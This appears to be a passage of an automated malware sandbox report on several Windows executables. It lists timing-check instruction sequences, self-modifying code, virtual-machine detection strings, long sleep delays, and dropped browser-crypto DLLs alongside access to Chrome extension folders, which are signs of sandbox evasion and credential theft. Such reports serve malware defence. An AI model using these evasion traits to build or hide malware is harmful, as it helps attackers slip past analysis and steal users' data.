Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB42 second address: 35EB48 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB48 second address: 35EB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB50 second address: 35EB54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB54 second address: 35EB77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F34D8F44CB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jp 00007F34D8F44CB6h 0x00000017 jmp 00007F34D8F44CBBh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 35EB77 second address: 35EB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C61C second address: 38C620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C620 second address: 38C626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C626 second address: 38C658 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F34D8F44CC7h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F34D8F44CB6h 0x0000001a jno 00007F34D8F44CB6h 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C658 second address: 38C65C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe RDTSC instruction interceptor: First address: 38C7C4 second address: 38C7DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: A7E68E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: A7E75F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C11391 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C1AFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Special instruction interceptor: First address: C97CFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1FE68E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 1FE75F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 391391 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 39AFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Special instruction interceptor: First address: 417CFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Code function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 715
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 1820
Source: C:\Windows\SysWOW64\cmd.exe Window / User API: threadDelayed 3774
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window / User API: threadDelayed 427
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 0.8 %
Source: C:\Users\user\Desktop\file.exe TID: 6432 Thread sleep count: 715 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588 Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7588 Thread sleep time: -62031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7592 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep count: 427 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep time: -12810000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572 Thread sleep count: 43 > 30
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7572 Thread sleep time: -86043s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7664 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7568 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe TID: 7552 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C60C930
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread delayed: delay time: 30000
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Essential Server Solutions without Hyper-V
Source: explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWd@&h
Source: Amcache.hve.3.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: vmware
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.3.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.3.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: file.exe, file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.000000000081C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: JJEGIJEGDB.exe, 00000005.00000002.1884071590.0000000000BF4000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000008.00000002.1915451030.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000009.00000002.1923451902.0000000000374000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2879169501.0000000000374000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1822925903.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.2879968817.0000000001529000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: file.exe, 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
